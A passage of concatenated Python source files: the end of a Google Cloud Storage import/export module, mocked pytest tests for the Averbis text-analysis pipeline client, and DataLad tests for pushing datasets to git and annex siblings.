# as described here: https://cloud.google.com/functions/docs/writing/http#uploading_files_via_cloud_storage
# (without needing access to a private key)
# Note: as described in that page, you need to run your function with a service account
# with the permission roles/iam.serviceAccountTokenCreator
auth_request = requests.Request()
credentials, project = google.auth.default()
storage_client = google_storage.Client(project, credentials)
data_bucket = storage_client.lookup_bucket(bucket_name)
signed_blob_path = data_bucket.blob(blob_name)
expires_at_ms = datetime.now() + timedelta(minutes=self.presign_ttl)
# This next line is the trick!
signing_credentials = compute_engine.IDTokenCredentials(auth_request, "",
service_account_email=None)
signed_url = signed_blob_path.generate_signed_url(expires_at_ms, credentials=signing_credentials, version="v4")
return signed_url
def resolve_uri(self, data):
uri, storage = get_uri_via_regex(data, prefixes=(url_scheme,))
if not storage:
return
logger.debug("Found matching storage uri in task data value: {uri}".format(uri=uri))
resolved_uri = self.resolve_gs(uri)
return data.replace(uri, resolved_uri)
def scan_and_create_links(self):
return self._scan_and_create_links(GCSImportStorageLink)
class GCSExportStorage(ExportStorage, GCSStorageMixin):
def save_annotation(self, annotation):
bucket = self.get_bucket()
logger.debug(f'Creating new object on {self.__class__.__name__} Storage {self} for annotation {annotation}')
ser_annotation = self._get_serialized_data(annotation)
with transaction.atomic():
# Create export storage link
link = GCSExportStorageLink.create(annotation, self)
key = str(self.prefix) + '/' + link.key if self.prefix else link.key
try:
blob = bucket.blob(key)
blob.upload_from_string(json.dumps(ser_annotation))
except Exception as exc:
logger.error(f"Can't export annotation {annotation} to GCS storage {self}. Reason: {exc}", exc_info=True)
@receiver(post_save, sender=Annotation)
def export_annotation_to_gcs_storages(sender, instance, **kwargs):
project = instance.task.project
if hasattr(project, 'io_storages_gcsexportstorages'):
for storage in project.io_storages_gcsexportstorages.all():
logger.debug(f'Export {instance} to GCS storage {storage}')
storage.save_annotation(instance)
class GCSImportStorageLink(ImportStorageLink):
storage = models.ForeignKey(GCSImportStorage, on_delete=models.CASCADE, related_name='links')
class GCSExportStorageLink(ExportStorageLink):
storage = models.ForeignKey(GCSExportStorage, on_delete=models.CASCADE, related_name='links')
|
the-stack_0_6542 | #
# Copyright (c) 2020 Averbis GmbH.
#
# This file is part of Averbis Python API.
# See https://www.averbis.com for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import logging
import os
from pathlib import Path
import pytest
import time
from averbis import Client, Project, Pipeline
from averbis.core import OperationTimeoutError
URL_BASE = "http://localhost:8080"
API_BASE = URL_BASE + "/rest/v1"
logging.basicConfig(level=logging.INFO)
@pytest.fixture
def client() -> Client:
return Client(URL_BASE)
@pytest.fixture
def pipeline_endpoint_behavior_mock():
return PipelineEndpointMock()
@pytest.fixture(autouse=True)
def pipeline_requests_mock(pipeline_endpoint_behavior_mock, requests_mock):
requests_mock.get(
f"{API_BASE}/textanalysis/projects/LoadTesting/pipelines/discharge",
headers={"Content-Type": "application/json"},
json=pipeline_endpoint_behavior_mock.info_callback,
)
requests_mock.put(
f"{API_BASE}/textanalysis/projects/LoadTesting/pipelines/discharge/start",
headers={"Content-Type": "application/json"},
json=pipeline_endpoint_behavior_mock.start_callback,
)
requests_mock.put(
f"{API_BASE}/textanalysis/projects/LoadTesting/pipelines/discharge/stop",
headers={"Content-Type": "application/json"},
json=pipeline_endpoint_behavior_mock.stop_callback,
)
@pytest.fixture()
def pipeline_analyse_text_mock(requests_mock):
requests_mock.get(
f"{API_BASE}/textanalysis/projects/LoadTesting/pipelines/discharge/configuration",
headers={"Content-Type": "application/json"},
json={
"payload": {"analysisEnginePoolSize": 4},
"errorMessages": [],
},
)
def callback(request, context):
doc_text = request.text.read().decode("utf-8")
return {
"payload": [
{
"begin": 0,
"end": len(doc_text),
"type": "uima.tcas.DocumentAnnotation",
"coveredText": doc_text
# ... truncated ...
},
],
"errorMessages": [],
}
requests_mock.post(
f"{API_BASE}/textanalysis/projects/LoadTesting/pipelines/discharge/analyseText",
headers={"Content-Type": "application/json"},
json=callback,
)
def test_ensure_started(client, pipeline_endpoint_behavior_mock):
pipeline_endpoint_behavior_mock.set_state(Pipeline.STATE_STOPPED)
pipeline = client.get_project("LoadTesting").get_pipeline("discharge")
pipeline.pipeline_state_change_timeout = 3
pipeline.pipeline_state_poll_interval = 1
assert pipeline.is_started() is False
pipeline.ensure_started()
assert pipeline.is_started() is True
def test_ensure_stopped(client, pipeline_endpoint_behavior_mock):
pipeline_endpoint_behavior_mock.set_state(Pipeline.STATE_STARTED)
pipeline = client.get_project("LoadTesting").get_pipeline("discharge")
pipeline.pipeline_state_change_timeout = 3
pipeline.pipeline_state_poll_interval = 1
assert pipeline.is_started() is True
pipeline.ensure_stopped()
assert pipeline.is_started() is False
def test_ensure_started_timeout(client, pipeline_endpoint_behavior_mock):
pipeline_endpoint_behavior_mock.set_state(Pipeline.STATE_STOPPED, locked=True)
pipeline = client.get_project("LoadTesting").get_pipeline("discharge")
pipeline.pipeline_state_change_timeout = 2
pipeline.pipeline_state_poll_interval = 1
assert pipeline.is_started() is False
with pytest.raises(OperationTimeoutError):
pipeline.ensure_started()
def test_ensure_started_failure_to_start(client, pipeline_endpoint_behavior_mock):
error_message = "Starting failed: org.apache.uima.ruta.extensions.RutaParseRuntimeException"
pipeline_endpoint_behavior_mock.set_state(
Pipeline.STATE_STOPPED,
locked=True,
pipeline_state_message=error_message,
)
pipeline = client.get_project("LoadTesting").get_pipeline("discharge")
pipeline.pipeline_state_change_timeout = 2
pipeline.pipeline_state_poll_interval = 1
assert pipeline.is_started() is False
with pytest.raises(Exception) as ex:
pipeline.ensure_started()
assert error_message in str(ex.value)
class PipelineEndpointMock:
def __init__(self):
self.change_state_after = 1
self.last_state_change_request = time.time()
self.state = Pipeline.STATE_STOPPED
self.pipeline_state_message = None
self.requested_state = Pipeline.STATE_STOPPED
self.requested_state_pipeline_state_message = None
self.state_locked = False
def set_state(
self, state: str, locked: bool = False, pipeline_state_message: str = None
) -> None:
self.state = state
self.requested_state = state
self.state_locked = locked
self.requested_state_pipeline_state_message = pipeline_state_message
def info_callback(self, request, context):
if (
not self.state_locked
and self.last_state_change_request + self.change_state_after < time.time()
):
self.state = self.requested_state
if self.last_state_change_request + self.change_state_after < time.time():
self.pipeline_state_message = self.requested_state_pipeline_state_message
return {
"payload": {
"id": 94034,
"name": "discharge",
"description": None,
"pipelineState": self.state,
"pipelineStateMessage": self.pipeline_state_message,
"preconfigured": True,
"scaleOuted": False,
},
"errorMessages": [],
}
def start_callback(self, request, context):
self.last_state_change_request = time.time()
self.requested_state = Pipeline.STATE_STARTED
return {"payload": {}, "errorMessages": []}
def stop_callback(self, request, context):
self.last_state_change_request = time.time()
self.requested_state = Pipeline.STATE_STOPPED
return {"payload": {}, "errorMessages": []}
def test_analyse_texts_with_paths(client, pipeline_analyse_text_mock):
pipeline = Pipeline(Project(client, "LoadTesting"), "discharge")
results = pipeline.analyse_texts(Path("tests/resources/texts").glob("*.txt"))
expected_results = []
for input_file in Path("tests/resources/texts").glob("*.txt"):
with open(input_file, "r", encoding="UTF-8") as input_io:
expected_results.append(
{"source": str(input_file).replace(os.sep, "/"), "text": input_io.read()}
)
assert [
{"source": result.source.replace(os.sep, "/"), "text": result.data[0]["coveredText"]}
for result in sorted(results, key=lambda x: x.source)
] == sorted(expected_results, key=lambda x: x["source"])
def test_analyse_texts_with_files(client, pipeline_analyse_text_mock):
pipeline = Pipeline(Project(client, "LoadTesting"), "discharge")
with open("tests/resources/texts/text1.txt", "rb") as file1, open(
"tests/resources/texts/text2.txt", "rb"
) as file2:
results = pipeline.analyse_texts([file1, file2])
sources = [result.source.replace(os.sep, "/") for result in results]
assert sources == ["tests/resources/texts/text1.txt", "tests/resources/texts/text2.txt"]
|
the-stack_0_6544 | # -*- coding: utf-8 -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Test push
"""
import os
import logging
from datalad.distribution.dataset import Dataset
from datalad.support.exceptions import (
IncompleteResultsError,
InsufficientArgumentsError,
)
from datalad.tests.utils import (
assert_false,
assert_in,
assert_in_results,
assert_not_in,
assert_not_in_results,
assert_raises,
assert_repo_status,
assert_result_count,
assert_status,
DEFAULT_BRANCH,
DEFAULT_REMOTE,
eq_,
known_failure_githubci_osx,
known_failure_githubci_win,
neq_,
ok_,
ok_file_has_content,
serve_path_via_http,
skip_if_adjusted_branch,
skip_if_on_windows,
skip_ssh,
slow,
swallow_logs,
with_tempfile,
with_tree,
SkipTest,
)
from datalad.utils import (
Path,
chpwd,
path_startswith,
swallow_outputs,
)
from datalad.support.gitrepo import GitRepo
from datalad.support.annexrepo import AnnexRepo
from datalad.core.distributed.clone import Clone
from datalad.core.distributed.push import Push
from datalad.support.network import get_local_file_url
DEFAULT_REFSPEC = "refs/heads/{0}:refs/heads/{0}".format(DEFAULT_BRANCH)
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
def test_invalid_call(origin, tdir):
ds = Dataset(origin).create()
# no target
assert_status('impossible', ds.push(on_failure='ignore'))
# no dataset
with chpwd(tdir):
assert_raises(InsufficientArgumentsError, Push.__call__)
# dataset, but outside path
assert_raises(IncompleteResultsError, ds.push, path=tdir)
# given a path constraint that doesn't match anything, will cause
# nothing to be done
assert_status('notneeded', ds.push(path=ds.pathobj / 'nothere'))
# unavailable subdataset
dummy_sub = ds.create('sub')
dummy_sub.uninstall()
assert_in('sub', ds.subdatasets(fulfilled=False, result_xfm='relpaths'))
# now an explicit call to publish the unavailable subdataset
assert_raises(ValueError, ds.push, 'sub')
target = mk_push_target(ds, 'target', tdir, annex=True)
# revision that doesn't exist
assert_raises(
ValueError,
ds.push, to='target', since='09320957509720437523')
# If a publish() user accidentally passes since='', which push() spells as
# since='^', the call is aborted.
assert_raises(
ValueError,
ds.push, to='target', since='')
def mk_push_target(ds, name, path, annex=True, bare=True):
# life could be simple, but nothing is simple on windows
#src.create_sibling(dst_path, name='target')
if annex:
if bare:
target = GitRepo(path=path, bare=True, create=True)
# cannot use call_annex()
target.call_git(['annex', 'init'])
else:
target = AnnexRepo(path, init=True, create=True)
if not target.is_managed_branch():
# for managed branches we need more fireworks->below
target.config.set(
'receive.denyCurrentBranch', 'updateInstead',
where='local')
else:
target = GitRepo(path=path, bare=bare, create=True)
ds.siblings('add', name=name, url=path, result_renderer=None)
if annex and not bare and target.is_managed_branch():
# maximum complication
# the target repo already has a commit that is unrelated
# to the source repo, because it has built a reference
# commit for the managed branch.
# the only sane approach is to let git-annex establish a shared
# history
ds.repo.call_annex(['sync'])
ds.repo.call_annex(['sync', '--cleanup'])
return target
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
def check_push(annex, src_path, dst_path):
# prepare src
src = Dataset(src_path).create(annex=annex)
src_repo = src.repo
# push should not add branches to the local dataset
orig_branches = src_repo.get_branches()
assert_not_in('synced/' + DEFAULT_BRANCH, orig_branches)
res = src.push(on_failure='ignore')
assert_result_count(res, 1)
assert_in_results(
res, status='impossible',
message='No push target given, and none could be auto-detected, '
'please specify via --to')
eq_(orig_branches, src_repo.get_branches())
# target sibling
target = mk_push_target(src, 'target', dst_path, annex=annex)
eq_(orig_branches, src_repo.get_branches())
res = src.push(to="target")
eq_(orig_branches, src_repo.get_branches())
assert_result_count(res, 2 if annex else 1)
assert_in_results(
res,
action='publish', status='ok', target='target',
refspec=DEFAULT_REFSPEC,
operations=['new-branch'])
assert_repo_status(src_repo, annex=annex)
eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),
list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))
# configure a default merge/upstream target
src.config.set('branch.{}.remote'.format(DEFAULT_BRANCH),
'target', where='local')
src.config.set('branch.{}.merge'.format(DEFAULT_BRANCH),
DEFAULT_BRANCH, where='local')
# don't fail when doing it again, no explicit target specification
# needed anymore
res = src.push()
eq_(orig_branches, src_repo.get_branches())
# and nothing is pushed
assert_status('notneeded', res)
assert_repo_status(src_repo, annex=annex)
eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),
list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))
# some modification:
(src.pathobj / 'test_mod_file').write_text("Some additional stuff.")
src.save(to_git=True, message="Modified.")
(src.pathobj / 'test_mod_annex_file').write_text("Heavy stuff.")
src.save(to_git=not annex, message="Modified again.")
assert_repo_status(src_repo, annex=annex)
# we could say since='HEAD~2' to make things fast, or we are lazy
# and say since='^' to indicate the state of the tracking remote
# which is the same, because we made to commits since the last push.
res = src.push(to='target', since="^", jobs=2)
assert_in_results(
res,
action='publish', status='ok', target='target',
refspec=DEFAULT_REFSPEC,
# we get to see what happened
operations=['fast-forward'])
if annex:
# we got to see the copy result for the annexed files
assert_in_results(
res,
action='copy',
status='ok',
path=str(src.pathobj / 'test_mod_annex_file'))
# we published, so we can drop and reobtain
ok_(src_repo.file_has_content('test_mod_annex_file'))
src_repo.drop('test_mod_annex_file')
ok_(not src_repo.file_has_content('test_mod_annex_file'))
src_repo.get('test_mod_annex_file')
ok_(src_repo.file_has_content('test_mod_annex_file'))
ok_file_has_content(
src_repo.pathobj / 'test_mod_annex_file',
'Heavy stuff.')
eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),
list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))
if not (annex and src_repo.is_managed_branch()):
# the following doesn't make sense in managed branches, because
# a commit that could be amended is no longer the last commit
# of a branch after a sync has happened (which did happen
# during the last push above
# amend and change commit msg in order to test for force push:
src_repo.commit("amended", options=['--amend'])
# push should be rejected (non-fast-forward):
res = src.push(to='target', since='HEAD~2', on_failure='ignore')
# fails before even touching the annex branch
assert_in_results(
res,
action='publish', status='error', target='target',
refspec=DEFAULT_REFSPEC,
operations=['rejected', 'error'])
# push with force=True works:
res = src.push(to='target', since='HEAD~2', force='gitpush')
assert_in_results(
res,
action='publish', status='ok', target='target',
refspec=DEFAULT_REFSPEC,
operations=['forced-update'])
eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),
list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))
# we do not have more branches than we had in the beginning
# in particular no 'synced/<default branch>'
eq_(orig_branches, src_repo.get_branches())
def test_push():
yield check_push, False
yield check_push, True
def check_datasets_order(res, order='bottom-up'):
"""Check that all type=dataset records not violating the expected order
it is somewhat weak test, i.e. records could be produced so we
do not detect that order is violated, e.g. a/b c/d would satisfy
either although they might be neither depth nor breadth wise. But
this test would allow to catch obvious violations like a, a/b, a
"""
prev = None
for r in res:
if r.get('type') != 'dataset':
continue
if prev and r['path'] != prev:
if order == 'bottom-up':
assert_false(path_startswith(r['path'], prev))
elif order == 'top-down':
assert_false(path_startswith(prev, r['path']))
else:
raise ValueError(order)
prev = r['path']
@slow # 33sec on Yarik's laptop
@with_tempfile
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True, suffix='sub')
@with_tempfile(mkdir=True, suffix='subnoannex')
@with_tempfile(mkdir=True, suffix='subsub')
def test_push_recursive(
origin_path, src_path, dst_top, dst_sub, dst_subnoannex, dst_subsub):
# dataset with two submodules and one subsubmodule
origin = Dataset(origin_path).create()
origin_subm1 = origin.create('sub m')
origin_subm1.create('subsub m')
origin.create('subm noannex', annex=False)
origin.save()
assert_repo_status(origin.path)
# prepare src as a fresh clone with all subdatasets checkout out recursively
# running on a clone should make the test scenario more different than
# test_push(), even for the pieces that should be identical
top = Clone.__call__(source=origin.path, path=src_path)
subs = top.get('.', recursive=True, get_data=False, result_xfm='datasets')
# order for '.' should not be relied upon, so sort by path
sub, subsub, subnoannex = sorted(subs, key=lambda ds: ds.path)
target_top = mk_push_target(top, 'target', dst_top, annex=True)
# subdatasets have no remote yet, so recursive publishing should fail:
res = top.push(to="target", recursive=True, on_failure='ignore')
check_datasets_order(res)
assert_in_results(
res, path=top.path, type='dataset',
refspec=DEFAULT_REFSPEC,
operations=['new-branch'], action='publish', status='ok',
target='target')
for d in (sub, subsub, subnoannex):
assert_in_results(
res, status='error', type='dataset', path=d.path,
message=("Unknown target sibling '%s'.",
'target'))
# now fix that and set up targets for the submodules
target_sub = mk_push_target(sub, 'target', dst_sub, annex=True)
target_subnoannex = mk_push_target(
subnoannex, 'target', dst_subnoannex, annex=False)
target_subsub = mk_push_target(subsub, 'target', dst_subsub, annex=True)
# and same push call as above
res = top.push(to="target", recursive=True)
check_datasets_order(res)
# topds skipped
assert_in_results(
res, path=top.path, type='dataset',
action='publish', status='notneeded', target='target')
# the rest pushed
for d in (sub, subsub, subnoannex):
assert_in_results(
res, status='ok', type='dataset', path=d.path,
refspec=DEFAULT_REFSPEC)
# all corresponding branches match across all datasets
for s, d in zip((top, sub, subnoannex, subsub),
(target_top, target_sub, target_subnoannex,
target_subsub)):
eq_(list(s.repo.get_branch_commits_(DEFAULT_BRANCH)),
list(d.get_branch_commits_(DEFAULT_BRANCH)))
if s != subnoannex:
eq_(list(s.repo.get_branch_commits_("git-annex")),
list(d.get_branch_commits_("git-annex")))
# rerun should not result in further pushes of the default branch
res = top.push(to="target", recursive=True)
check_datasets_order(res)
assert_not_in_results(
res, status='ok', refspec=DEFAULT_REFSPEC)
assert_in_results(
res, status='notneeded', refspec=DEFAULT_REFSPEC)
# now annex a file in subsub
test_copy_file = subsub.pathobj / 'test_mod_annex_file'
test_copy_file.write_text("Heavy stuff.")
# save all the way up
assert_status(
('ok', 'notneeded'),
top.save(message='subsub got something', recursive=True))
assert_repo_status(top.path)
# publish straight up, should be smart by default
res = top.push(to="target", recursive=True)
check_datasets_order(res)
# we see 3 out of 4 datasets pushed (sub noannex was left unchanged)
for d in (top, sub, subsub):
assert_in_results(
res, status='ok', type='dataset', path=d.path,
refspec=DEFAULT_REFSPEC)
# file content copied too
assert_in_results(
res,
action='copy',
status='ok',
path=str(test_copy_file))
# verify it is accessible, drop and bring back
assert_status('ok', top.drop(str(test_copy_file)))
ok_(not subsub.repo.file_has_content('test_mod_annex_file'))
top.get(test_copy_file)
ok_file_has_content(test_copy_file, 'Heavy stuff.')
# make two modification
(sub.pathobj / 'test_mod_annex_file').write_text('annex')
(subnoannex.pathobj / 'test_mod_file').write_text('git')
# save separately
top.save(sub.pathobj, message='annexadd', recursive=True)
top.save(subnoannex.pathobj, message='gitadd', recursive=True)
# now only publish the latter one
res = top.push(to="target", since=DEFAULT_BRANCH + '~1', recursive=True)
# nothing copied, no reports on the other modification
assert_not_in_results(res, action='copy')
assert_not_in_results(res, path=sub.path)
for d in (top, subnoannex):
assert_in_results(
res, status='ok', type='dataset', path=d.path,
refspec=DEFAULT_REFSPEC)
# an unconditional push should now pick up the remaining changes
res = top.push(to="target", recursive=True)
assert_in_results(
res,
action='copy',
status='ok',
path=str(sub.pathobj / 'test_mod_annex_file'))
assert_in_results(
res, status='ok', type='dataset', path=sub.path,
refspec=DEFAULT_REFSPEC)
for d in (top, subnoannex, subsub):
assert_in_results(
res, status='notneeded', type='dataset', path=d.path,
refspec=DEFAULT_REFSPEC)
# if noannex target gets some annex, we still should not fail to push
target_subnoannex.call_git(['annex', 'init'])
# just to ensure that we do need something to push
(subnoannex.pathobj / "newfile").write_text("content")
subnoannex.save()
res = subnoannex.push(to="target")
assert_in_results(res, status='ok', type='dataset')
@slow # 12sec on Yarik's laptop
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
def test_push_subds_no_recursion(src_path, dst_top, dst_sub, dst_subsub):
# dataset with one submodule and one subsubmodule
top = Dataset(src_path).create()
sub = top.create('sub m')
test_file = sub.pathobj / 'subdir' / 'test_file'
test_file.parent.mkdir()
test_file.write_text('some')
subsub = sub.create(sub.pathobj / 'subdir' / 'subsub m')
top.save(recursive=True)
assert_repo_status(top.path)
target_top = mk_push_target(top, 'target', dst_top, annex=True)
target_sub = mk_push_target(sub, 'target', dst_sub, annex=True)
target_subsub = mk_push_target(subsub, 'target', dst_subsub, annex=True)
# now publish, but NO recursion, instead give the parent dir of
# both a subdataset and a file in the middle subdataset
res = top.push(
to='target',
# give relative to top dataset to elevate the difficulty a little
path=str(test_file.relative_to(top.pathobj).parent))
assert_status('ok', res)
assert_in_results(res, action='publish', type='dataset', path=top.path)
assert_in_results(res, action='publish', type='dataset', path=sub.path)
assert_in_results(res, action='copy', type='file', path=str(test_file))
# the lowest-level subdataset isn't touched
assert_not_in_results(
res, action='publish', type='dataset', path=subsub.path)
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
def test_force_checkdatapresent(srcpath, dstpath):
src = Dataset(srcpath).create()
target = mk_push_target(src, 'target', dstpath, annex=True, bare=True)
(src.pathobj / 'test_mod_annex_file').write_text("Heavy stuff.")
src.save(to_git=False, message="New annex file")
assert_repo_status(src.path, annex=True)
whereis_prior = src.repo.whereis(files=['test_mod_annex_file'])[0]
res = src.push(to='target', data='nothing')
# nothing reported to be copied
assert_not_in_results(res, action='copy')
# we got the git-push nevertheless
eq_(src.repo.get_hexsha(DEFAULT_BRANCH), target.get_hexsha(DEFAULT_BRANCH))
# nothing moved
eq_(whereis_prior, src.repo.whereis(files=['test_mod_annex_file'])[0])
# now a push without forced no-transfer
# we do not give since, so the non-transfered file is picked up
# and transferred
res = src.push(to='target', force=None)
# no branch change, done before
assert_in_results(res, action='publish', status='notneeded',
refspec=DEFAULT_REFSPEC)
# but availability update
assert_in_results(res, action='publish', status='ok',
refspec='refs/heads/git-annex:refs/heads/git-annex')
assert_in_results(res, status='ok',
path=str(src.pathobj / 'test_mod_annex_file'),
action='copy')
# whereis info reflects the change
ok_(len(whereis_prior) < len(
src.repo.whereis(files=['test_mod_annex_file'])[0]))
# do it yet again will do nothing, because all is up-to-date
assert_status('notneeded', src.push(to='target', force=None))
# an explicit reference point doesn't change that
assert_status('notneeded',
src.push(to='target', force=None, since='HEAD~1'))
# now force data transfer
res = src.push(to='target', force='checkdatapresent')
# no branch change, done before
assert_in_results(res, action='publish', status='notneeded',
refspec=DEFAULT_REFSPEC)
# no availability update
assert_in_results(res, action='publish', status='notneeded',
refspec='refs/heads/git-annex:refs/heads/git-annex')
# but data transfer
assert_in_results(res, status='ok',
path=str(src.pathobj / 'test_mod_annex_file'),
action='copy')
# force data transfer, but data isn't available
src.repo.drop('test_mod_annex_file')
res = src.push(to='target', path='.', force='checkdatapresent', on_failure='ignore')
assert_in_results(res, status='impossible',
path=str(src.pathobj / 'test_mod_annex_file'),
action='copy',
message='Slated for transport, but no content present')
@skip_if_on_windows # https://github.com/datalad/datalad/issues/4278
@with_tempfile(mkdir=True)
@with_tree(tree={'ria-layout-version': '1\n'})
def test_ria_push(srcpath, dstpath):
# complex test involving a git remote, a special remote, and a
# publication dependency
src = Dataset(srcpath).create()
testfile = src.pathobj / 'test_mod_annex_file'
testfile.write_text("Heavy stuff.")
src.save()
assert_status(
'ok',
src.create_sibling_ria(
"ria+{}".format(get_local_file_url(dstpath, compatibility='git')),
"datastore"))
res = src.push(to='datastore')
assert_in_results(
res, action='publish', target='datastore', status='ok',
refspec=DEFAULT_REFSPEC)
assert_in_results(
res, action='publish', target='datastore', status='ok',
refspec='refs/heads/git-annex:refs/heads/git-annex')
assert_in_results(
res, action='copy', target='datastore-storage', status='ok',
path=str(testfile))
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
def test_gh1426(origin_path, target_path):
# set up a pair of repos, one the published copy of the other
origin = Dataset(origin_path).create()
target = mk_push_target(
origin, 'target', target_path, annex=True, bare=False)
origin.push(to='target')
assert_repo_status(origin.path)
assert_repo_status(target.path)
eq_(origin.repo.get_hexsha(DEFAULT_BRANCH),
target.get_hexsha(DEFAULT_BRANCH))
# gist of #1426 is that a newly added subdataset does not cause the
# superdataset to get published
origin.create('sub')
assert_repo_status(origin.path)
neq_(origin.repo.get_hexsha(DEFAULT_BRANCH),
target.get_hexsha(DEFAULT_BRANCH))
# now push
res = origin.push(to='target')
assert_result_count(
res, 1, status='ok', type='dataset', path=origin.path,
action='publish', target='target', operations=['fast-forward'])
eq_(origin.repo.get_hexsha(DEFAULT_BRANCH),
target.get_hexsha(DEFAULT_BRANCH))
@skip_if_adjusted_branch # gh-4075
@skip_if_on_windows # create_sibling incompatible with win servers
@skip_ssh
@with_tree(tree={'1': '123'})
@with_tempfile(mkdir=True)
@serve_path_via_http
def test_publish_target_url(src, desttop, desturl):
# https://github.com/datalad/datalad/issues/1762
ds = Dataset(src).create(force=True)
ds.save('1')
ds.create_sibling('ssh://datalad-test:%s/subdir' % desttop,
name='target',
target_url=desturl + 'subdir/.git')
results = ds.push(to='target')
assert results
ok_file_has_content(Path(desttop, 'subdir', '1'), '123')
@with_tempfile(mkdir=True)
@with_tempfile()
@with_tempfile()
def test_gh1763(src, target1, target2):
# this test is very similar to test_publish_depends, but more
# comprehensible, and directly tests issue 1763
src = Dataset(src).create(force=True)
target1 = mk_push_target(src, 'target1', target1, bare=False)
target2 = mk_push_target(src, 'target2', target2, bare=False)
src.siblings('configure', name='target2', publish_depends='target1',
result_renderer=None)
# a file to annex
(src.pathobj / 'probe1').write_text('probe1')
src.save('probe1', to_git=False)
# make sure the probe is annexed, not straight in Git
assert_in('probe1', src.repo.get_annexed_files(with_content_only=True))
# publish to target2, must handle dependency
src.push(to='target2')
for target in (target1, target2):
# with a managed branch we are pushing into the corresponding branch
# and do not see a change in the worktree
if not target.is_managed_branch():
# direct test for what is in the checkout
assert_in(
'probe1',
target.get_annexed_files(with_content_only=True))
# ensure git-annex knows this target has the file
assert_in(target.config.get('annex.uuid'), src.repo.whereis(['probe1'])[0])
@with_tempfile()
@with_tempfile()
def test_gh1811(srcpath, clonepath):
orig = Dataset(srcpath).create()
(orig.pathobj / 'some').write_text('some')
orig.save()
clone = Clone.__call__(source=orig.path, path=clonepath)
(clone.pathobj / 'somemore').write_text('somemore')
clone.save()
clone.repo.call_git(['checkout', 'HEAD~1'])
res = clone.push(to=DEFAULT_REMOTE, on_failure='ignore')
assert_result_count(res, 1)
assert_result_count(
res, 1,
path=clone.path, type='dataset', action='publish',
status='impossible',
message='There is no active branch, cannot determine remote '
'branch',
)
# FIXME: on crippled FS post-update hook enabling via create-sibling doesn't
# work ATM
@skip_if_adjusted_branch
@with_tempfile()
@with_tempfile()
def test_push_wanted(srcpath, dstpath):
src = Dataset(srcpath).create()
(src.pathobj / 'data.0').write_text('0')
(src.pathobj / 'secure.1').write_text('1')
(src.pathobj / 'secure.2').write_text('2')
src.save()
# Dropping a file to mimic a case of simply not having it locally (thus not
# to be "pushed")
src.drop('secure.2', check=False)
# Annotate sensitive content, actual value "verysecure" does not matter in
# this example
src.repo.set_metadata(
add={'distribution-restrictions': 'verysecure'},
files=['secure.1', 'secure.2'])
src.create_sibling(
dstpath,
annex_wanted="not metadata=distribution-restrictions=*",
name='target',
)
# check that wanted is obeyed, since set in sibling configuration
res = src.push(to='target')
assert_in_results(
res, action='copy', path=str(src.pathobj / 'data.0'), status='ok')
for p in ('secure.1', 'secure.2'):
assert_not_in_results(res, path=str(src.pathobj / p))
assert_status('notneeded', src.push(to='target'))
# check the target to really make sure
dst = Dataset(dstpath)
# normal file, yes
eq_((dst.pathobj / 'data.0').read_text(), '0')
# secure file, no
if dst.repo.is_managed_branch():
neq_((dst.pathobj / 'secure.1').read_text(), '1')
else:
assert_raises(FileNotFoundError, (dst.pathobj / 'secure.1').read_text)
# reset wanted config, which must enable push of secure file
src.repo.set_preferred_content('wanted', '', remote='target')
res = src.push(to='target')
assert_in_results(res, path=str(src.pathobj / 'secure.1'))
eq_((dst.pathobj / 'secure.1').read_text(), '1')
# FIXME: on crippled FS post-update hook enabling via create-sibling doesn't
# work ATM
@skip_if_adjusted_branch
@slow # 10sec on Yarik's laptop
@with_tempfile(mkdir=True)
def test_auto_data_transfer(path):
path = Path(path)
ds_a = Dataset(path / "a").create()
(ds_a.pathobj / "foo.dat").write_text("foo")
ds_a.save()
# Should be the default, but just in case.
ds_a.repo.config.set("annex.numcopies", "1", where="local")
ds_a.create_sibling(str(path / "b"), name="b")
# With numcopies=1, no data is copied with data="auto".
res = ds_a.push(to="b", data="auto", since=None)
assert_not_in_results(res, action="copy")
# Even when a file is explicitly given.
res = ds_a.push(to="b", path="foo.dat", data="auto", since=None)
assert_not_in_results(res, action="copy")
# numcopies=2 changes that.
ds_a.repo.config.set("annex.numcopies", "2", where="local")
res = ds_a.push(to="b", data="auto", since=None)
assert_in_results(
res, action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "foo.dat"))
# --since= limits the files considered by --auto.
(ds_a.pathobj / "bar.dat").write_text("bar")
ds_a.save()
(ds_a.pathobj / "baz.dat").write_text("baz")
ds_a.save()
res = ds_a.push(to="b", data="auto", since="HEAD~1")
assert_not_in_results(
res,
action="copy", path=str(ds_a.pathobj / "bar.dat"))
assert_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "baz.dat"))
# --auto also considers preferred content.
ds_a.repo.config.unset("annex.numcopies", where="local")
ds_a.repo.set_preferred_content("wanted", "nothing", remote="b")
res = ds_a.push(to="b", data="auto", since=None)
assert_not_in_results(
res,
action="copy", path=str(ds_a.pathobj / "bar.dat"))
ds_a.repo.set_preferred_content("wanted", "anything", remote="b")
res = ds_a.push(to="b", data="auto", since=None)
assert_in_results(
